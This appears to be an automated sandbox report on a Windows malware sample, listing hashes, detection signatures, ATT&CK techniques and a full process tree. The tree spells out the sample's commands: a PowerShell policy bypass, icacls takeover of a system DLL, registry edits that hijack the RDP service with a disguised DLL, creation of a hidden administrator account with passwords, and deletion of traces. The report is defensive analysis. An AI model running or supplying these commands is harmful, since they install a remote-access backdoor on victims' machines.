Analysis

  • max time kernel
    138s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    08-11-2020 17:47

General

  • Target

    d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe

  • Size

    3.1MB

  • MD5

    c9cc3da6e84aedbd74218e5edea5d039

  • SHA1

    f7b3f452245571dfe0906f417cf1cf1097d5cc44

  • SHA256

    d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45

  • SHA512

    fb33da351c2f8e68dfcf32f373f2894ef1fd7ad523aa85426231eaf5412d63a47a12ef078f3e56e124676d787f6d71139cec377fa60c7ba7ce255f5d4b18f7fe

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 130 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
    "C:\Users\Admin\AppData\Local\Temp\d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:744
    • \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1692
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j3pchmrj\j3pchmrj.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A18.tmp" "c:\Users\Admin\AppData\Local\Temp\j3pchmrj\CSCB9EDC8978269444385119477438F5B7.TMP"
          4⤵
            PID:1560
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1604
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1512
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:616
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1312
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:292
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1640
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1208
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1356
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:968
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1760
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1648
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:324
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:904
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1684
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1924
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1568
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:532
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                    PID:1476
                    • C:\Windows\system32\net.exe
                      net start rdpdr
                      5⤵
                        PID:1620
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 start rdpdr
                          6⤵
                            PID:520
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                      3⤵
                        PID:848
                        • C:\Windows\system32\cmd.exe
                          cmd /c net start TermService
                          4⤵
                            PID:1372
                            • C:\Windows\system32\net.exe
                              net start TermService
                              5⤵
                                PID:1624
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 start TermService
                                  6⤵
                                    PID:828
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                              3⤵
                                PID:324
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                3⤵
                                  PID:1192
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user wgautilacc Ghar4f5 /del
                              1⤵
                                PID:640
                                • C:\Windows\system32\net.exe
                                  net.exe user wgautilacc Ghar4f5 /del
                                  2⤵
                                    PID:1556
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                                      3⤵
                                        PID:1208
                                  • C:\Windows\System32\cmd.exe
                                    cmd /C net.exe user wgautilacc hvgvPMAg /add
                                    1⤵
                                      PID:1300
                                      • C:\Windows\system32\net.exe
                                        net.exe user wgautilacc hvgvPMAg /add
                                        2⤵
                                          PID:1016
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user wgautilacc hvgvPMAg /add
                                            3⤵
                                              PID:1760
                                        • C:\Windows\System32\cmd.exe
                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                          1⤵
                                            PID:324
                                            • C:\Windows\system32\net.exe
                                              net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                              2⤵
                                                PID:1328
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                  3⤵
                                                    PID:1920
                                              • C:\Windows\System32\cmd.exe
                                                cmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
                                                1⤵
                                                  PID:1448
                                                  • C:\Windows\system32\net.exe
                                                    net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
                                                    2⤵
                                                      PID:936
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
                                                        3⤵
                                                          PID:1476
                                                    • C:\Windows\System32\cmd.exe
                                                      cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                      1⤵
                                                        PID:1136
                                                        • C:\Windows\system32\net.exe
                                                          net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                          2⤵
                                                            PID:1324
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                              3⤵
                                                                PID:1780
                                                          • C:\Windows\System32\cmd.exe
                                                            cmd /C net.exe user wgautilacc hvgvPMAg
                                                            1⤵
                                                              PID:1208
                                                              • C:\Windows\system32\net.exe
                                                                net.exe user wgautilacc hvgvPMAg
                                                                2⤵
                                                                  PID:288
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user wgautilacc hvgvPMAg
                                                                    3⤵
                                                                      PID:1016
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C net user wgautilacc 1234
                                                                  1⤵
                                                                    PID:788
                                                                    • C:\Windows\system32\net.exe
                                                                      net user wgautilacc 1234
                                                                      2⤵
                                                                        PID:1448
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 user wgautilacc 1234
                                                                          3⤵
                                                                            PID:1048

                                                                      Network

                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                      Persistence

                                                                      Account Manipulation

                                                                      1
                                                                      T1098

                                                                      Registry Run Keys / Startup Folder

                                                                      1
                                                                      T1060

                                                                      Modify Existing Service

                                                                      1
                                                                      T1031

                                                                      Defense Evasion

                                                                      Modify Registry

                                                                      3
                                                                      T1112

                                                                      File Permissions Modification

                                                                      1
                                                                      T1222

                                                                      Lateral Movement

                                                                      Remote Desktop Protocol

                                                                      1
                                                                      T1076

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0f778224-aeab-4368-9a02-1c2076c40c24
                                                                        MD5

                                                                        a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                                                        SHA1

                                                                        81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                                                        SHA256

                                                                        dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                                                        SHA512

                                                                        8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5f7600d5-300e-41b1-bcb6-a43912a13e43
                                                                        MD5

                                                                        faa37917b36371249ac9fcf93317bf97

                                                                        SHA1

                                                                        a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                                                                        SHA256

                                                                        b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                                                                        SHA512

                                                                        614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6eaa4cb1-9395-4a91-b5d4-c579679a93e5
                                                                        MD5

                                                                        d89968acfbd0cd60b51df04860d99896

                                                                        SHA1

                                                                        b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                                                        SHA256

                                                                        1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                                                        SHA512

                                                                        b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_73b78946-b75f-44c2-ad3a-00cd73e21896
                                                                        MD5

                                                                        2d5cd190b5db0620cd62e3cd6ba1dcd3

                                                                        SHA1

                                                                        ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                                                                        SHA256

                                                                        ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                                                                        SHA512

                                                                        edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c047bef2-07ba-4139-9c2b-6905e5f6ff5f
                                                                        MD5

                                                                        6f0d509e28be1af95ba237d4f43adab4

                                                                        SHA1

                                                                        c665febe79e435843553bee86a6cea731ce6c5e4

                                                                        SHA256

                                                                        f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                                                                        SHA512

                                                                        8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d1695748-e871-4cde-843a-bb83da2ac4c2
                                                                        MD5

                                                                        7f79b990cb5ed648f9e583fe35527aa7

                                                                        SHA1

                                                                        71b177b48c8bd745ef02c2affad79ca222da7c33

                                                                        SHA256

                                                                        080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                                                        SHA512

                                                                        20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef5927d8-c8a8-48dc-95fd-18bb5bf7226b
                                                                        MD5

                                                                        e5b3ba61c3cf07deda462c9b27eb4166

                                                                        SHA1

                                                                        b324dad73048be6e27467315f82b7a5c1438a1f9

                                                                        SHA256

                                                                        b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                                                                        SHA512

                                                                        a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        467eac3c23268e84c84234215137c575

                                                                        SHA1

                                                                        1dde3c7c1bec68e8fe806730bbba9e2acf980d06

                                                                        SHA256

                                                                        fecfcc964fc77c168190ee46c5003ead7a8387f33da2963b6a4aa70a51dda2ca

                                                                        SHA512

                                                                        e35fb7a8bb8589ecd1981347eff26176daf5db5d1c71731d9ee8afdf32ceab81b4a210ffd5336478d8941379337505aa84b60a7fe60d49992bc573dcbd9fd142

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        06b192595fce4a787822c326b9b1e700

                                                                        SHA1

                                                                        f475e9013e7391bd92b2e83ce45e9a31aba13c35

                                                                        SHA256

                                                                        9bbdcdde5b2ee979f0f9887e0147f8a7a158eb88bf958ee67d968f0dc8c4e4de

                                                                        SHA512

                                                                        22de2a652675115fd575fe36e254b09942db79730dbe6004d0fecfe6bfb4fad7611474d848315825de18deefb287c714a09ccbe1d78691a844977cc85de54bf3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        01c9c6db14ee072b28514049db8f14b9

                                                                        SHA1

                                                                        380fbd5ff32a0f41f03955cce8dca14305858bc1

                                                                        SHA256

                                                                        c5336de24b19bd0a0a198c8c63df446b33b23e1255dabc3287d7f6828051340a

                                                                        SHA512

                                                                        435c3d4e73d5193bbbb8dd828b44832fe514cf2f0a6f4ab25fd5a56a7a0bc0304edbbe21ca7ad5a45eb05052c3567df838e1c4bf2152ad355fdc125b5efea2fc

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        cae1322e278616cfe99cbda3bce56e25

                                                                        SHA1

                                                                        40288e0f3781f245a35fdc32a20f9b664bbcddb1

                                                                        SHA256

                                                                        a3db7abaa3275992f48f87a08bfb413ddfefa112983681b17b4d11cea0ba82bf

                                                                        SHA512

                                                                        c92581a8c4a88bb94b98c8a9a357172c90986d9ca67ca708c6488398940b7b32a19848659c10b659fc1913c111df2d0136d88c5a500c7ca2e097a488d080c643

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        41c62e61c92dc4f3f8d3a388139f2409

                                                                        SHA1

                                                                        345684c559d0857c4c1ad820ff36800ff641f028

                                                                        SHA256

                                                                        9315be1224e148d75eedf51b1ce5f5f2b908bd426d9c9c24c0d5cfde70cf1045

                                                                        SHA512

                                                                        109d8fc776d504cbfeaed31253c95f472d1f165ec930a26c603a8de16516380f933b09b93f775995d2908865ebbdd7f5d7fe67d33356590f4ad18544e0636515

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES6A18.tmp
                                                                        MD5

                                                                        1a27420f7623b62012f136881233a600

                                                                        SHA1

                                                                        ca4017b7aeb8faf573a78bad61a197d338b6e8ca

                                                                        SHA256

                                                                        ada3d52373a1ca432dc23ba30a11b3d1e326611948ad9569b7b2fa2ea6907190

                                                                        SHA512

                                                                        6703b0825ad761b370c3b214c69f6fb60ad22f285a68ccde6bf5147d158a0db67f533df29854633eddbad1cfa636f305b806c1f10a13d11737d4884c6fde89c4

                                                                      • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                                                        MD5

                                                                        41d1a9d1cbee90f1e5f27fdfb299f8b8

                                                                        SHA1

                                                                        1e9ac27006a7c364649265246fccbd719418ceab

                                                                        SHA256

                                                                        0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

                                                                        SHA512

                                                                        f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

                                                                      • C:\Users\Admin\AppData\Local\Temp\j3pchmrj\j3pchmrj.dll
                                                                        MD5

                                                                        d31a8705298fd6a70ad28fe44c3116f8

                                                                        SHA1

                                                                        67dc351d7c83ab239d7a380bea3329f0b05350dc

                                                                        SHA256

                                                                        b83501803baee5982b7c5f89f435462ada29c4202d08d52a61f10bec2dad3489

                                                                        SHA512

                                                                        0bdfd197b7ecb513ad78319af88bf21cdc0c15f551e1e2986c73d95bfd153098776e72151212d513ff66b391260d72f1cb6dcedff470ec5927b95f623f595d74

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        115f4556aeac6a5fdd7be2474cd24e93

                                                                        SHA1

                                                                        98dbb6869d686a5c2013657dc13fa50397f8f2f6

                                                                        SHA256

                                                                        175476739eacaa8adf6a8569908c9a403ed7b5e113d1a36dfbabb454832cb1a5

                                                                        SHA512

                                                                        9f59d7dd9aa6b6ac849c42e703506d52a4c4174d1c918a4576a4127b8c0f9cd41033947b71b329df643f41a32b6d400a32c917acf6fd17bb277fc001eb9305da

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        115f4556aeac6a5fdd7be2474cd24e93

                                                                        SHA1

                                                                        98dbb6869d686a5c2013657dc13fa50397f8f2f6

                                                                        SHA256

                                                                        175476739eacaa8adf6a8569908c9a403ed7b5e113d1a36dfbabb454832cb1a5

                                                                        SHA512

                                                                        9f59d7dd9aa6b6ac849c42e703506d52a4c4174d1c918a4576a4127b8c0f9cd41033947b71b329df643f41a32b6d400a32c917acf6fd17bb277fc001eb9305da

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        115f4556aeac6a5fdd7be2474cd24e93

                                                                        SHA1

                                                                        98dbb6869d686a5c2013657dc13fa50397f8f2f6

                                                                        SHA256

                                                                        175476739eacaa8adf6a8569908c9a403ed7b5e113d1a36dfbabb454832cb1a5

                                                                        SHA512

                                                                        9f59d7dd9aa6b6ac849c42e703506d52a4c4174d1c918a4576a4127b8c0f9cd41033947b71b329df643f41a32b6d400a32c917acf6fd17bb277fc001eb9305da

                                                                      • C:\Windows\system32\rfxvmt.dll
                                                                        MD5

                                                                        dc39d23e4c0e681fad7a3e1342a2843c

                                                                        SHA1

                                                                        58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                        SHA256

                                                                        6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                        SHA512

                                                                        5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                      • \??\PIPE\lsarpc
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\j3pchmrj\CSCB9EDC8978269444385119477438F5B7.TMP
                                                                        MD5

                                                                        25b38c44370abf08dd544c8d4d3075bc

                                                                        SHA1

                                                                        52d73e5be953f0b70fe301e9beabef3aeaeaf890

                                                                        SHA256

                                                                        40ab6c2e7c14badb7ff1c4e874331a5a67c078771ee1f4a675bb424533a7b048

                                                                        SHA512

                                                                        388c483fb70289162bb17534192f4b4202114d5afa1dfcf1d7575ac1daf232bb3493fb9cff328c15f643ed5e4356d746555aa18827faaa9576418a1394a69474

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\j3pchmrj\j3pchmrj.0.cs
                                                                        MD5

                                                                        8e55cb0ca998472ab6d3e295e0c4dd50

                                                                        SHA1

                                                                        407d07a29b89fc3afc246c0680d5857e3f51019d

                                                                        SHA256

                                                                        63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

                                                                        SHA512

                                                                        c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\j3pchmrj\j3pchmrj.cmdline
                                                                        MD5

                                                                        ed594ba02c8678fe525dac8697073b76

                                                                        SHA1

                                                                        b97d9ec64a752e62e3a248b44aa23dc7625d38ac

                                                                        SHA256

                                                                        3f5efb4e8b53a4d1ec3abeeea78ba96ade5f2100eea63ddeeebd49f42d1ebfac

                                                                        SHA512

                                                                        a0517e0007af4ffccb2b46af08c3d7a6e3e4f7919c6a43babd58ad05c103b07fe5afa7cd854095af7c66f7688d0baa5becb8122e2f65859d335c814e16946504

                                                                      • \Windows\Branding\mediasrv.png
                                                                        MD5

                                                                        37fb7ba711ffbe9d6ebb27d54e827966

                                                                        SHA1

                                                                        4d4d9303e011bcb14720b24239a1aacd58122f47

                                                                        SHA256

                                                                        81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

                                                                        SHA512

                                                                        3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

                                                                      • \Windows\Branding\mediasvc.png
                                                                        MD5

                                                                        2f916498a393e2f0d008d33a74c062ba

                                                                        SHA1

                                                                        404d52d4253ef3843ae3f2c4aff050f37fcd3f08

                                                                        SHA256

                                                                        d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

                                                                        SHA512

                                                                        d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

                                                                      • memory/288-123-0x0000000000000000-mapping.dmp
                                                                      • memory/292-87-0x0000000000000000-mapping.dmp
                                                                      • memory/324-94-0x0000000000000000-mapping.dmp
                                                                      • memory/324-126-0x0000000000000000-mapping.dmp
                                                                      • memory/520-102-0x0000000000000000-mapping.dmp
                                                                      • memory/532-99-0x0000000000000000-mapping.dmp
                                                                      • memory/616-40-0x0000000000000000-mapping.dmp
                                                                      • memory/616-42-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/744-1-0x00000000008F0000-0x0000000000901000-memory.dmp
                                                                        Filesize

                                                                        68KB

                                                                      • memory/744-0-0x00000000005F0000-0x00000000008E1000-memory.dmp
                                                                        Filesize

                                                                        2.9MB

                                                                      • memory/828-106-0x0000000000000000-mapping.dmp
                                                                      • memory/848-103-0x0000000000000000-mapping.dmp
                                                                      • memory/904-95-0x0000000000000000-mapping.dmp
                                                                      • memory/936-117-0x0000000000000000-mapping.dmp
                                                                      • memory/968-91-0x0000000000000000-mapping.dmp
